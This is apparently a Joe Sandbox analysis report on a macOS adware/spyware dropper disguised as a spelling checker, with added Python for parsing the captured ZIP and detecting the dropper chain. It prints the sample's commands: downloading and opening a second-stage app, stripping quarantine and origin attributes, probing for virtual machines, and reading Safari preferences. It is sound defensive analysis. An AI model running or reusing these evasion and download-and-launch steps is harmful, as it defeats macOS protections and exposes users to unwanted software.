
Analysis Report iWk7svKGhJ

Overview

General Information

Joe Sandbox Version:24.0.0
Analysis ID:61433
Start date:03.10.2018
Start time:14:11:09
Joe Sandbox Product:Cloud
Overall analysis duration:0h 5m 31s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:iWk7svKGhJ (renamed file extension from none to app)
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Mac Mini, High Sierra 10.13.2 (MS Office 16.9, Java 1.8.0_25)
Detection:MAL
Classification:mal72.adwa.spyw.evad.macAPP@0/8@2/0

Detection

Strategy    Score   Range     Reporting        Detection
Threshold   72      0 - 100   Report FP / FN   malicious

Classification

Analysis Advice

Some of the sample's HTTP requests target resources that do not exist (404 Not Found), so the sample will likely exhibit less behavior than it would against live infrastructure.



Signature Overview



Networking:

Downloads compressed data via HTTP
Source: global traffic. HTTP traffic detected:
    HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 03 Oct 2018 12:12:21 GMT
    Content-Type: application/zip
    Content-Length: 53113
    Last-Modified: Tue, 25 Sep 2018 17:08:06 GMT
    Connection: keep-alive
    ETag: "5baa6b76-cf79"
    Accept-Ranges: bytes
    Data Raw (truncated): 50 4b 03 04 0a 00 00 00 00 00 a7 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 10 00 53 65 61 72 63 68 2e 61 70 70 2f 55 58 0c 00 b3 24 aa 5b 79 24 aa 5b f5 01 14 00 50 4b 03 04 0a 00 00 00 00 00 a7 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 14 00 10 00 53 65 61 72 63 68 2e 61 70 70 2f 43 6f 6e 74 65 6e 74 73 2f 55 58 0c 00 b3 24 aa 5b 79 24 aa 5b f5 01 14 00 50 4b 03 04 0a 00 00 00 00 00 a7 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 23 00 10 00 53 65 61 72 63 68 2e 61 70 70 2f 43 6f 6e 74 65 6e 74 73 2f 5f 43 6f 64 65 53 69 67 6e 61 74 75 72 65 2f 55 58 0c 00 b3 24 aa 5b 79 24 aa 5b f5 01 14 00 50 4b 03 04 14 00 08 00 08 00 af 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 30 00 10 00 53 65 61 72 63 68 2e 61 70 70 2f 43 6f 6e 74 65 6e 74 73 2f 5f 43 6f 64 65
    The body starts with ZIP local file headers for Search.app/, Search.app/Contents/ and Search.app/Contents/_CodeSignature/ (stored directory entries carrying Info-ZIP "UX" extra fields with uid 501 / gid 20), so the response is the Search.app bundle that unzip later writes to /private/tmp. The Content-Length of 53113 matches the size of the dropped ZIP /private/tmp/.dat.nosync02c6.3NY2ts.
Downloads files from webservers via HTTP
Source: global traffic. HTTP traffic detected:
    GET /hello.txt HTTP/1.1
    Host: vision-set.download
    Accept: */*
    Accept-Language: en-us
    Connection: keep-alive
    Accept-Encoding: gzip, deflate
    User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global traffic. HTTP traffic detected:
    GET /readautoip.php?prefix=upd: HTTP/1.1
    Host: rs64nrl.info
    Accept: */*
    Accept-Language: en-us
    Connection: keep-alive
    Accept-Encoding: gzip, deflate
    User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global traffic. HTTP traffic detected:
    GET /files/cmdse.txt HTTP/1.1
    Host: vision-set.download
    Accept: */*
    Cookie: PHPSESSID=fc4m3g6a5jd0bl2j4t3muq3a73
    User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
Source: global traffic. HTTP traffic detected:
    GET /files/Search.zip HTTP/1.1
    Host: vision-set.download
    Accept: */*
    Cookie: PHPSESSID=fc4m3g6a5jd0bl2j4t3muq3a73
    User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
Performs DNS lookups
Source: unknown. DNS traffic detected: queries for: vision-set.download
Posts data to webserver
Source: unknown. HTTP traffic detected:
    POST /api/event/ping.php HTTP/1.1
    Host: vision-set.download
    Content-Type: text/plain
    Connection: keep-alive
    X-Sig: 9d367d4a3ad24b5a591135355f3e9c86
    Accept: */*
    Accept-Language: en-us
    Content-Length: 664
    Accept-Encoding: gzip, deflate
    User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Tries to download non-existing http data (HTTP/1.1 404 Not Found)
Source: global traffic. HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.9.15
    Date: Wed, 03 Oct 2018 12:12:20 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Access-Control-Allow-Origin: *
    Content-Encoding: gzip
    Data Raw: 32 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 f3 4e ad 54 c8 cb 2f 51 48 cb 2f cd 4b 51 04 00 c6 30 55 ce 0e 00 00 00 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 22NT/QH/KQ0U0
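The raw ZIP bytes in the 200 OK response above can be read directly from the capture. The following Python is an added example (not part of the Joe Sandbox report and not code from the sample): it walks the ZIP local file headers in the hex quoted above, copied from the report, and recovers entry names, compression method, DOS timestamp and the Info-ZIP "UX" extra field (atime, mtime, uid, gid). Because the capture stops in the middle of the fourth header, the walker reports a truncated last entry instead of failing. Class and function names are this example's own.

```python
"""Walk the ZIP local file headers of a (possibly truncated) HTTP response body.

Added example; not code from the report or the sample. RAW_HEX is the
"Data Raw" hex printed in the report for the 200 OK response (it stops
part-way through the fourth local file header).
"""
import struct
from dataclasses import dataclass
from typing import List, Optional

RAW_HEX = (
    "50 4b 03 04 0a 00 00 00 00 00 a7 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 10 00 "
    "53 65 61 72 63 68 2e 61 70 70 2f 55 58 0c 00 b3 24 aa 5b 79 24 aa 5b f5 01 14 00 "
    "50 4b 03 04 0a 00 00 00 00 00 a7 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 14 00 10 00 "
    "53 65 61 72 63 68 2e 61 70 70 2f 43 6f 6e 74 65 6e 74 73 2f 55 58 0c 00 b3 24 aa 5b 79 24 aa 5b f5 01 14 00 "
    "50 4b 03 04 0a 00 00 00 00 00 a7 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 23 00 10 00 "
    "53 65 61 72 63 68 2e 61 70 70 2f 43 6f 6e 74 65 6e 74 73 2f 5f 43 6f 64 65 53 69 67 6e 61 74 75 72 65 2f "
    "55 58 0c 00 b3 24 aa 5b 79 24 aa 5b f5 01 14 00 "
    "50 4b 03 04 14 00 08 00 08 00 af 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 30 00 10 00 "
    "53 65 61 72 63 68 2e 61 70 70 2f 43 6f 6e 74 65 6e 74 73 2f 5f 43 6f 64 65"
)
RAW = bytes.fromhex(RAW_HEX)

LOCAL_SIG = b"PK\x03\x04"
# signature, version, flags, method, mod time, mod date, crc32, csize, usize, name len, extra len
LOCAL_FMT = "<4sHHHHHIIIHH"
LOCAL_LEN = struct.calcsize(LOCAL_FMT)  # 30 bytes
UX_TAG = 0x5855  # Info-ZIP "UX" extra field: atime, mtime (UTC epoch seconds), uid, gid


@dataclass
class LocalEntry:
    name: str
    method: int            # 0 = stored, 8 = deflate
    flags: int             # bit 3 set: sizes/CRC follow the data in a data descriptor
    dos_time: str          # local time, 2-second resolution
    csize: int
    usize: int
    unix_atime: Optional[int] = None
    unix_mtime: Optional[int] = None
    uid: Optional[int] = None
    gid: Optional[int] = None
    truncated: bool = False  # header, name or extra cut off by the end of the capture


def dos_datetime(date: int, time: int) -> str:
    """Decode the MS-DOS date/time pair every ZIP header carries."""
    year, month, day = (date >> 9) + 1980, (date >> 5) & 0xF, date & 0x1F
    hour, minute, second = time >> 11, (time >> 5) & 0x3F, (time & 0x1F) * 2
    return f"{year:04d}-{month:02d}-{day:02d} {hour:02d}:{minute:02d}:{second:02d}"


def apply_extra(entry: LocalEntry, extra: bytes) -> None:
    """Pull Unix metadata out of the (tag, size, body) records of the extra field."""
    off = 0
    while off + 4 <= len(extra):
        tag, size = struct.unpack_from("<HH", extra, off)
        body = extra[off + 4:off + 4 + size]
        if tag == UX_TAG and len(body) >= 8:
            entry.unix_atime, entry.unix_mtime = struct.unpack_from("<II", body, 0)
            if len(body) >= 12:
                entry.uid, entry.gid = struct.unpack_from("<HH", body, 8)
        off += 4 + size


def walk_local_headers(buf: bytes) -> List[LocalEntry]:
    """One LocalEntry per local file header; stops cleanly at a truncated or streamed entry."""
    entries: List[LocalEntry] = []
    off = 0
    while off + LOCAL_LEN <= len(buf) and buf[off:off + 4] == LOCAL_SIG:
        _, _ver, flags, method, mtime, mdate, _crc, csize, usize, nlen, elen = \
            struct.unpack_from(LOCAL_FMT, buf, off)
        name_off = off + LOCAL_LEN
        name = buf[name_off:name_off + nlen]
        extra = buf[name_off + nlen:name_off + nlen + elen]
        entry = LocalEntry(name.decode("utf-8", "replace"), method, flags,
                           dos_datetime(mdate, mtime), csize, usize)
        entries.append(entry)
        if len(name) < nlen or len(extra) < elen:
            entry.truncated = True  # the capture ended inside this header
            break
        apply_extra(entry, extra)
        if flags & 0x8 and csize == 0:
            break  # streamed entry: its data length is only in the data descriptor / central directory
        off = name_off + nlen + elen + csize
    return entries


def bundle_root(entries: List[LocalEntry]) -> Optional[str]:
    """Top-level .app directory named by the first entry, if the archive is an app bundle."""
    if not entries:
        return None
    first = entries[0].name.split("/")[0]
    return first if first.endswith(".app") else None


if __name__ == "__main__":
    for e in walk_local_headers(RAW):
        print(f"{e.name!r:42} method={e.method} dos={e.dos_time} mtime={e.unix_mtime} "
              f"uid={e.uid} gid={e.gid} truncated={e.truncated}")
    print("bundle:", bundle_root(walk_local_headers(RAW)))
```

The first three entries are stored directories (method 0) whose UX field records uid 501 / gid 20; their DOS time (14:05:14, local) and UX mtime (12:05:13 UTC) differ by two hours, consistent with an archive built on a UTC+2 host. The fourth header is a deflated file (method 8) with the data-descriptor flag set, and its name is cut off after "Search.app/Contents/_Code" in the capture.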

Spam, unwanted Advertisements and Ransom Demands:

Reads the preferences of Safari
Source: /bin/sh (PID: 725). Defaults executable reading com.apple.Safari preferences: /usr/bin/defaults

System Summary:

Classification label
Source: classification engine. Classification label: mal72.adwa.spyw.evad.macAPP@0/8@2/0

Data Obfuscation:

Imports the IOKit library (often used to register services)
Source: initial sample. Static MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit

Persistence and Installation Behavior:

Changes permissions of written Mach-O files
Source: /usr/bin/unzip (PID: 718). Permissions modified for written 64-bit Mach-O /private/tmp/Search.app/Contents/MacOS/Search: bits: - usr: rx grp: rx all: rwx
Creates application bundles
Source: /usr/bin/unzip (PID: 718). Bundle Info.plist file created: Search.app/Contents/Info.plist
Creates code signed application bundles
Source: /usr/bin/unzip (PID: 718). Bundle code signature resource file created: Search.app/Contents/_CodeSignature/CodeResources
Creates hidden files, links and/or directories
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710). Hidden file created: /tmp/.dat.nosync02c6.3NY2ts
Executes commands using a shell command-line interpreter
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710). Shell command executed: /bin/sh -c ioreg -l | grep -e 'VirtualBox' -e 'Oracle' -e 'VMware' -e 'Parallels' | wc -l
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710). Shell command executed: /bin/sh -c cd /tmp/ /usr/bin/unzip -o /tmp/ot4860.zip
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722). Shell command executed: /bin/sh -c /bin/sh -c 'defaults read com.apple.Safari \'NSWindow Frame Preferences\' > /tmp/b.txt ' &
Source: /bin/sh (PID: 724). Shell command executed: /bin/sh -c defaults read com.apple.Safari 'NSWindow Frame Preferences' > /tmp/b.txt
Executes the "grep" command used to find patterns in files or piped streams
Source: /bin/sh (PID: 713). Grep executable: /usr/bin/grep -> grep -e VirtualBox -e Oracle -e VMware -e Parallels
Opens applications that may have been created by the sample
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710). Application opened: /usr/bin/open /tmp/Search.app
Reads launchservices plist files
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710). Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /usr/bin/open (PID: 721). Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722). Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722). Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Reads user launchservices plist file containing default apps for corresponding file types
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722). Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Reads, modifies and/or removes extended attributes containing macOS specific file meta data
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710). Xattr command executed: /usr/bin/xattr -d -r com.apple.quarantine /tmp/ot4860.zip
Uses CFNetwork bundle containing interfaces for network communication (HTTP, sockets, and Bonjour)
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710). CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plist
Writes 64-bit Mach-O files to disk
Source: /usr/bin/unzip (PID: 718). File written: /private/tmp/Search.app/Contents/MacOS/Search
Writes Mach-O files to the tmp directory
Source: /usr/bin/unzip (PID: 718). 64-bit Mach-O written to tmp path: /private/tmp/Search.app/Contents/MacOS/Search
Writes ZIP files to disk
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710). ZIP file created: /private/tmp/.dat.nosync02c6.3NY2ts
App bundle is code signed
Source: Submitted file: iWk7svKGhJ.app. CodeResources XML file: CodeResources
Source: Submitted file: .dat.nosync02c6.3NY2ts.266.dr. CodeResources XML file: CodeResources
Reads data from the local random generator
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 715). Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 716). Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 719). Random device file read: /dev/urandom
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 720). Random device file read: /dev/urandom
Uses AppleKeyboardLayouts bundle containing keyboard layouts
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722). AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Uses the Python framework
Source: /usr/bin/xattr (PID: 715). Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /usr/bin/xattr (PID: 716). Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /usr/bin/xattr (PID: 719). Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /usr/bin/xattr (PID: 720). Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Writes property list (.plist) files to disk
Source: /usr/bin/unzip (PID: 718). XML plist file created: /private/tmp/Search.app/Contents/_CodeSignature/CodeResources
Source: /usr/bin/unzip (PID: 718). Binary plist file created: /private/tmp/Search.app/Contents/Resources/Base.lproj/MainMenu.nib
Source: /usr/bin/unzip (PID: 718). XML plist file created: /private/tmp/Search.app/Contents/Info.plist

Hooking and other Techniques for Hiding and Protection:

Removes the kMDItemWhereFroms extended attribute to disguise the file's origin (typically to hide the source URL of a downloaded file)
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710). Xattr command executed: /usr/bin/xattr -d -r com.apple.metadata:kMDItemWhereFroms /tmp/ot4860.zip

Malware Analysis System Evasion:

Searches for VM related strings in files or piped streams (probably for evasion)
Source: /bin/sh (PID: 713). Grep searching for VM related keyword(s): /usr/bin/grep -> grep -e VirtualBox -e Oracle -e VMware -e Parallels

HIPS / PFW / Operating System Protection Evasion:

Removes the quarantine attribute (used to protect from malware) from files
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710). Xattr command executed: /usr/bin/xattr -d -r com.apple.quarantine /tmp/ot4860.zip
Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722). Sysctl read request: kern.safeboot (1.66)

Language, Device and Operating System Detection:

Executes the "ioreg" command used to gather hardware information (I/O Kit registry)
Source: /bin/sh (PID: 712). IOreg executable: /usr/sbin/ioreg -> ioreg -l
Reads hardware related sysctl values
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722). Sysctl read request: hw.availcpu (6.25)
Reads the system's OS release and/or type
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710). Sysctl requested: kern.ostype (1.1)
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710). Sysctl requested: kern.osrelease (1.2)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 715). Sysctl requested: kern.ostype (1.1)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 715). Sysctl requested: kern.osrelease (1.2)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 716). Sysctl requested: kern.ostype (1.1)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 716). Sysctl requested: kern.osrelease (1.2)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 719). Sysctl requested: kern.ostype (1.1)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 719). Sysctl requested: kern.osrelease (1.2)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 720). Sysctl requested: kern.ostype (1.1)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 720). Sysctl requested: kern.osrelease (1.2)
Reads the system's hostname
Source: /bin/sh (PID: 711). Sysctl requested: kern.hostname (1.10)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 715). Sysctl requested: kern.hostname (1.10)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 716). Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 717). Sysctl requested: kern.hostname (1.10)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 719). Sysctl requested: kern.hostname (1.10)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 720). Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 723). Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 724). Sysctl requested: kern.hostname (1.10)
Reads the system or server version plist file
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710). System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 715). System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 716). System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 719). System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 720). System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/open (PID: 721). System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722). System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist

Lowering of HIPS / PFW / Operating System Security Settings:

Executes the "defaults" command used to read or modify user specific settings
Source: /bin/sh (PID: 725). Defaults executable: /usr/bin/defaults -> defaults read com.apple.Safari NSWindow Frame Preferences
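The Persistence, Evasion and Lowering-of-security-settings sections above record the whole dropper chain as plain shell commands: an ioreg | grep probe for VirtualBox/Oracle/VMware/Parallels, xattr -d of com.apple.quarantine and com.apple.metadata:kMDItemWhereFroms on the downloaded ZIP, unzip into /tmp, open of /tmp/Search.app, and a defaults read of Safari preferences from the second stage. The following Python is an added example, not Joe Sandbox or sample code: it encodes those behaviours as rules over process-creation records (constructed here from the report's own entries; the report lists four xattr processes without saying which ran which command, so the mapping of the quarantine and kMDItemWhereFroms commands to PIDs 715 and 716 is assumed) and then groups hits by process tree, so that the unquarantine, unpack and launch steps must come from the same ancestor before a tree is called a dropper. Rule names and record fields are this example's own.

```python
"""Detection rules for the dropper chain this report records, run over process events.

Added example; not code from Joe Sandbox or the sample. EVENTS is constructed
from the report's "Shell command executed", "Xattr command executed" and
"Application opened" entries; PIDs 715/716 for the two xattr commands are
assumed. Rule names, fields and the chain definition are this example's own.
"""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Set


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable path, as an EDR / Endpoint Security process event reports it
    cmdline: str


@dataclass(frozen=True)
class Finding:
    pid: int
    technique: str
    evidence: str


SC = "/Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker"
EVENTS = [  # constructed from the report; see the module docstring
    ProcEvent(710, 1, SC, "SpellingChecker"),
    ProcEvent(711, 710, "/bin/sh", "/bin/sh -c ioreg -l | grep -e 'VirtualBox' -e 'Oracle' -e 'VMware' -e 'Parallels' | wc -l"),
    ProcEvent(715, 710, "/usr/bin/xattr", "/usr/bin/xattr -d -r com.apple.quarantine /tmp/ot4860.zip"),
    ProcEvent(716, 710, "/usr/bin/xattr", "/usr/bin/xattr -d -r com.apple.metadata:kMDItemWhereFroms /tmp/ot4860.zip"),
    ProcEvent(717, 710, "/bin/sh", "/bin/sh -c cd /tmp/ /usr/bin/unzip -o /tmp/ot4860.zip"),
    ProcEvent(721, 710, "/usr/bin/open", "/usr/bin/open /tmp/Search.app"),
    ProcEvent(722, 1, "/private/tmp/Search.app/Contents/MacOS/Search", "Search"),
    ProcEvent(723, 722, "/bin/sh", "/bin/sh -c /bin/sh -c 'defaults read com.apple.Safari \\'NSWindow Frame Preferences\\' > /tmp/b.txt ' &"),
    ProcEvent(724, 723, "/bin/sh", "/bin/sh -c defaults read com.apple.Safari 'NSWindow Frame Preferences' > /tmp/b.txt"),
    ProcEvent(725, 724, "/usr/bin/defaults", "defaults read com.apple.Safari NSWindow Frame Preferences"),
]

TMP_PATH = re.compile(r"(?:^|\s)(/(?:private/)?tmp/\S*)")
VM_MARKERS = ("virtualbox", "vmware", "parallels", "oracle")  # the strings the sample greps for


def vm_probe(ev: ProcEvent) -> bool:
    low = ev.cmdline.lower()
    return "ioreg" in low and any(m in low for m in VM_MARKERS)


def xattr_strip(attr: str) -> Callable[[ProcEvent], bool]:
    """Rule factory: xattr -d of one attribute (quarantine or kMDItemWhereFroms)."""
    def rule(ev: ProcEvent) -> bool:
        argv = ev.cmdline.split()
        return ev.image.endswith("/xattr") and "-d" in argv and attr in argv
    return rule


def tmp_unpack(ev: ProcEvent) -> bool:
    return "unzip" in ev.cmdline and any(p.endswith(".zip") for p in TMP_PATH.findall(ev.cmdline))


def tmp_app_launch(ev: ProcEvent) -> bool:
    return ev.image.endswith("/open") and any(p.rstrip("/").endswith(".app") for p in TMP_PATH.findall(ev.cmdline))


def browser_prefs_read(ev: ProcEvent) -> bool:
    # Match the defaults(1) exec itself so the sh -c wrappers around it are not counted twice.
    return ev.image.endswith("/defaults") and "read" in ev.cmdline.split() and "com.apple.Safari" in ev.cmdline


RULES: Dict[str, Callable[[ProcEvent], bool]] = {
    "vm-probe": vm_probe,
    "quarantine-strip": xattr_strip("com.apple.quarantine"),
    "wherefroms-strip": xattr_strip("com.apple.metadata:kMDItemWhereFroms"),
    "tmp-unpack": tmp_unpack,
    "tmp-app-launch": tmp_app_launch,
    "browser-prefs-read": browser_prefs_read,
}
# "unquarantine, unpack into /tmp, launch from /tmp" from one process tree = dropper
DROPPER_CHAIN = {"quarantine-strip", "tmp-unpack", "tmp-app-launch"}


def scan(events: List[ProcEvent]) -> List[Finding]:
    return [Finding(ev.pid, name, ev.cmdline) for ev in events for name, rule in RULES.items() if rule(ev)]


def root_pid(pid: int, by_pid: Dict[int, ProcEvent]) -> int:
    """Follow ppid links up to the first process whose parent is outside the record set."""
    seen: Set[int] = set()
    while pid in by_pid and by_pid[pid].ppid in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid].ppid
    return pid


def dropper_chains(events: List[ProcEvent], findings: List[Finding]) -> Dict[int, Set[str]]:
    """Group findings by process tree; return the roots whose tree shows the full chain."""
    by_pid = {ev.pid: ev for ev in events}
    per_root: Dict[int, Set[str]] = {}
    for f in findings:
        per_root.setdefault(root_pid(f.pid, by_pid), set()).add(f.technique)
    return {root: techs for root, techs in per_root.items() if DROPPER_CHAIN <= techs}
```

Run against the constructed events, scan() yields one finding per technique and dropper_chains() names only PID 710 (SpellingChecker): the Search tree (PID 722) only reads Safari preferences and does not qualify on its own. The grouping by ancestor is what keeps a legitimate unzip in /tmp, or a lone xattr -d run by an administrator, from being scored as a dropper.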


Runtime Messages

Command:open
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Standard Error:

Behavior Graph


Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
Behavior Graph ID: 61433   Sample: iWk7svKGhJ   Start date: 03/10/2018   Architecture: MAC   Score: 72

DNS/IP nodes:
  rs64nrl.info          163.172.60.125 (ports 49237, 80)           AS12876FR   United Kingdom
  vision-set.download   195.154.31.197 (ports 49235, 49236, 49238)  AS12876FR   France

Process tree (signatures and dropped files are listed under the process that triggered them):
  xpcproxy -> SpellingChecker (1 created file)
    Signatures: Removes the kMDItemWhereFroms extended attribute to disguise the file's origin (typically to hide the source URL of a downloaded file); Removes the quarantine attribute (used to protect from malware) from files
    sh
      sh -> ioreg    Signature: Executes the "ioreg" command used to gather hardware information (I/O Kit registry)
      sh -> grep     Signature: Searches for VM related strings in files or piped streams (probably for evasion)
      sh -> wc
    sh
      sh -> unzip (5 created files)    Dropped: /private/tmp/Searc...ntents/MacOS/Search, Mach-O
    xattr -> Python
    4 other processes
  xpcproxy -> Search
    sh
      sh -> sh
        sh -> defaults (1 created file)    Signatures: Reads the preferences of Safari; Executes the "defaults" command used to read or modify user specific settings

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Screenshots


Startup

  • system is mac1
  • xpcproxy (PID: 710 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • SpellingChecker (PID: 710 PPID: 1 Overlayed Process Image: xpcproxy MD5: 0194c31984d1501bf9835c0d4d48cbbf)
    • sh (PID: 711 PPID: 710 MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 712 PPID: 711 MD5: 8aa60b22a5d30418a002b340989384dc)
      • ioreg (PID: 712 PPID: 711 Overlayed Process Image: sh MD5: c728ee7d6c0e4941de5ab855a856f473)
      • sh (PID: 713 PPID: 711 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 713 PPID: 711 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • sh (PID: 714 PPID: 711 MD5: 8aa60b22a5d30418a002b340989384dc)
      • wc (PID: 714 PPID: 711 Overlayed Process Image: sh MD5: b89949ce6a1929257e5c0c157027cbfe)
    • xattr (PID: 715 PPID: 710 MD5: e2ca6555fe4b8c6a97d1ced2156c9b69)
    • Python (PID: 715 PPID: 710 Overlayed Process Image: xattr MD5: ba780ab677147d9db60c564ef3f51dd0)
    • xattr (PID: 716 PPID: 710 MD5: e2ca6555fe4b8c6a97d1ced2156c9b69)
    • Python (PID: 716 PPID: 710 Overlayed Process Image: xattr MD5: ba780ab677147d9db60c564ef3f51dd0)
    • sh (PID: 717 PPID: 710 MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 718 PPID: 717 MD5: 8aa60b22a5d30418a002b340989384dc)
